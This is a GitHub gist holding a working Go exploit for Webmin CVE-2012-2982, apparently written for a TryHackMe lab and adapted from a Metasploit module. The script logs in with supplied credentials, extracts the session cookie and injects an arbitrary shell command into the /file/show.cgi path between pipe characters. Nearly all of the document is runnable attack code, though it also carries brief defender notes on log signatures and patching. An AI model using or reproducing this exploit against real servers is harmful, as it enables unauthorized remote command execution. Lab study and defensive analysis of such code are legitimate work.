@ChrisPritchard
Last active April 5, 2021 19:27
An exploit for Webmin CVE-2012-2982, in Go
// built as part of https://tryhackme.com/room/intropocscripting
// I used Go instead of Python, so this is a good resource for quick HTTP requests with Go
// reverse engineered from https://www.exploit-db.com/exploits/21851 (Ruby Metasploit module)
package main
import (
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
"strings"
)
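// main logs in to a Webmin instance with the supplied credentials and sends
// the single request that demonstrates CVE-2012-2982, then prints the
// response body.
//
// Usage: <url to webmin> <username> <password> <cmd>
//
// The issue is an authenticated command injection: as the second request
// below shows, the command travels in the path after /file/show.cgi,
// delimited by '|' characters. A valid session is required, so the first
// request performs a normal form login and extracts the sid cookie.
//
// Defender notes: in web or proxy access logs this appears as a POST to
// /session_login.cgi followed by a GET to /file/show.cgi whose path contains
// '|' (possibly percent-encoded as %7C). Updating Webmin to a release that
// carries the fix for this CVE and restricting who can reach the
// administration interface remove the exposure.
func main() {
	if len(os.Args) < 5 {
		log.Fatal("args: <url to webmin> <username> <password> <cmd>")
	}
	webminUrl := os.Args[1]
	username := os.Args[2]
	password := os.Args[3]
	command := os.Args[4]

	// All traffic is routed through a local intercepting proxy so the
	// requests can be inspected. Nothing will be sent unless a proxy is
	// listening on this address; the error checks below report that case
	// instead of dereferencing a nil response.
	proxyUrl, err := url.Parse("http://127.0.0.1:8080")
	if err != nil {
		log.Fatalf("parsing proxy url: %v", err)
	}
	client := &http.Client{
		Transport: &http.Transport{Proxy: http.ProxyURL(proxyUrl)},
		// The login answers with a redirect; the session cookie is on that
		// response, so redirects must not be followed.
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}

	// Form-encode the credentials so characters such as '&', '=' or '+'
	// do not corrupt the request body.
	data := "page=%2F&user=" + url.QueryEscape(username) + "&pass=" + url.QueryEscape(password)
	req, err := http.NewRequest(http.MethodPost, webminUrl+"/session_login.cgi", strings.NewReader(data))
	if err != nil {
		log.Fatalf("building login request: %v", err)
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Add("Cookie", "testing=1")
	resp, err := client.Do(req)
	if err != nil {
		log.Fatalf("sending login request: %v", err)
	}
	// Only the headers of the login response are needed.
	resp.Body.Close()

	// The session id is read from the first Set-Cookie header as the 32
	// characters following "sid=". A failed login (or an unexpected server)
	// would otherwise cause an index-out-of-range panic here.
	cookies := resp.Header["Set-Cookie"]
	if len(cookies) == 0 || !strings.HasPrefix(cookies[0], "sid=") || len(cookies[0]) < 36 {
		log.Fatalf("login response carried no usable sid cookie (status %s)", resp.Status)
	}
	sid := cookies[0][4:36]

	// 12345 is chosen arbitrarily - it does not seem to need to be random.
	// The variable is not called "url" so that it does not shadow net/url.
	target := fmt.Sprintf("%s/file/show.cgi/bin/%s|%s|", webminUrl, "12345", command)
	req, err = http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		log.Fatalf("building show.cgi request: %v", err)
	}
	req.Header.Add("Cookie", "testing=1; sid="+sid)
	resp, err = client.Do(req)
	if err != nil {
		log.Fatalf("sending show.cgi request: %v", err)
	}
	body, err := ioutil.ReadAll(resp.Body)
	// Close explicitly rather than with defer: log.Fatalf exits without
	// running deferred calls.
	resp.Body.Close()
	if err != nil {
		log.Fatalf("reading show.cgi response: %v", err)
	}
	fmt.Println(string(body))
}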